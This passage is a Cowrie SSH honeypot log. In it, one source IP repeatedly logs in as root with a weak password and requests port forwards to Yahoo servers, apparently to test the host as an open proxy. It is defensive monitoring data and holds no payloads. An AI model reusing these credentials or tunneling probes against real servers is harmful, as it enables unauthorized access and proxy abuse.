{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":60378,"dst_ip":"1.2.3.4","dst_port":22,"session":"03c8f4358302","protocol":"ssh","message":"New connection: 213.209.150.239:60378 (1.2.3.4:22) [session: 03c8f4358302]","sensor":"my-vps","timestamp":"2025-08-26T00:57:26.339839Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:26.340769Z","src_ip":"213.209.150.239","session":"03c8f4358302"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:26.387518Z","src_ip":"213.209.150.239","session":"03c8f4358302"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:26.621415Z","src_ip":"213.209.150.239","session":"03c8f4358302"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":20559,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:20559","sensor":"my-vps","timestamp":"2025-08-26T00:57:26.669029Z","session":"03c8f4358302"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:26.715842Z","src_ip":"213.209.150.239","session":"03c8f4358302"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":32646,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:32646","sensor":"my-vps","timestamp":"2025-08-26T00:57:26.853278Z","session":"03c8f4358302"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:26.900315Z","src_ip":"213.209.150.239","session":"03c8f4358302"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:26.948241Z","src_ip":"213.209.150.239","session":"03c8f4358302"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":60416,"dst_ip":"1.2.3.4","dst_port":22,"session":"d1cb54ece3db","protocol":"ssh","message":"New connection: 213.209.150.239:60416 (1.2.3.4:22) [session: d1cb54ece3db]","sensor":"my-vps","timestamp":"2025-08-26T00:57:27.005860Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:27.015110Z","src_ip":"213.209.150.239","session":"d1cb54ece3db"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:27.062919Z","src_ip":"213.209.150.239","session":"d1cb54ece3db"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:27.346293Z","src_ip":"213.209.150.239","session":"d1cb54ece3db"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":1857,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:1857","sensor":"my-vps","timestamp":"2025-08-26T00:57:27.405468Z","session":"d1cb54ece3db"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:27.462255Z","src_ip":"213.209.150.239","session":"d1cb54ece3db"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":14000,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:14000","sensor":"my-vps","timestamp":"2025-08-26T00:57:27.619060Z","session":"d1cb54ece3db"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:27.675803Z","src_ip":"213.209.150.239","session":"d1cb54ece3db"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:27.733007Z","src_ip":"213.209.150.239","session":"d1cb54ece3db"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":60462,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ba1c1ad3673","protocol":"ssh","message":"New connection: 213.209.150.239:60462 (1.2.3.4:22) [session: 7ba1c1ad3673]","sensor":"my-vps","timestamp":"2025-08-26T00:57:27.779182Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:27.779746Z","src_ip":"213.209.150.239","session":"7ba1c1ad3673"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:27.826935Z","src_ip":"213.209.150.239","session":"7ba1c1ad3673"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:28.061475Z","src_ip":"213.209.150.239","session":"7ba1c1ad3673"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":21164,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:21164","sensor":"my-vps","timestamp":"2025-08-26T00:57:28.109854Z","session":"7ba1c1ad3673"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:28.157160Z","src_ip":"213.209.150.239","session":"7ba1c1ad3673"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":17576,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:17576","sensor":"my-vps","timestamp":"2025-08-26T00:57:28.293553Z","session":"7ba1c1ad3673"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:28.340808Z","src_ip":"213.209.150.239","session":"7ba1c1ad3673"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:28.388902Z","src_ip":"213.209.150.239","session":"7ba1c1ad3673"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":60509,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b16005639bb","protocol":"ssh","message":"New connection: 213.209.150.239:60509 (1.2.3.4:22) [session: 9b16005639bb]","sensor":"my-vps","timestamp":"2025-08-26T00:57:28.435538Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:28.436635Z","src_ip":"213.209.150.239","session":"9b16005639bb"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:28.483927Z","src_ip":"213.209.150.239","session":"9b16005639bb"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:28.718941Z","src_ip":"213.209.150.239","session":"9b16005639bb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":20001,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:20001","sensor":"my-vps","timestamp":"2025-08-26T00:57:28.767017Z","session":"9b16005639bb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:28.814267Z","src_ip":"213.209.150.239","session":"9b16005639bb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":19611,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:19611","sensor":"my-vps","timestamp":"2025-08-26T00:57:28.949697Z","session":"9b16005639bb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:28.997024Z","src_ip":"213.209.150.239","session":"9b16005639bb"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:29.045727Z","src_ip":"213.209.150.239","session":"9b16005639bb"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":60552,"dst_ip":"1.2.3.4","dst_port":22,"session":"08987b709e6c","protocol":"ssh","message":"New connection: 213.209.150.239:60552 (1.2.3.4:22) [session: 08987b709e6c]","sensor":"my-vps","timestamp":"2025-08-26T00:57:29.101474Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:29.102071Z","src_ip":"213.209.150.239","session":"08987b709e6c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:57:29.158870Z","src_ip":"213.209.150.239","session":"08987b709e6c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:57:29.441725Z","src_ip":"213.209.150.239","session":"08987b709e6c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":14954,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:14954","sensor":"my-vps","timestamp":"2025-08-26T00:57:29.499331Z","session":"08987b709e6c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:29.556138Z","src_ip":"213.209.150.239","session":"08987b709e6c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":15064,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:15064","sensor":"my-vps","timestamp":"2025-08-26T00:57:29.711411Z","session":"08987b709e6c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:57:29.768089Z","src_ip":"213.209.150.239","session":"08987b709e6c"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:57:29.825499Z","src_ip":"213.209.150.239","session":"08987b709e6c"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":60604,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc3e2e291539","protocol":"ssh","message":"New connection: 213.209.150.239:60604 (1.2.3.4:22) [session: fc3e2e291539]","sensor":"my-vps","timestamp":"2025-08-26T00:57:29.881274Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:57:29.882005Z","src_ip":"213.209.150.239","session":"fc3e2e291539"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr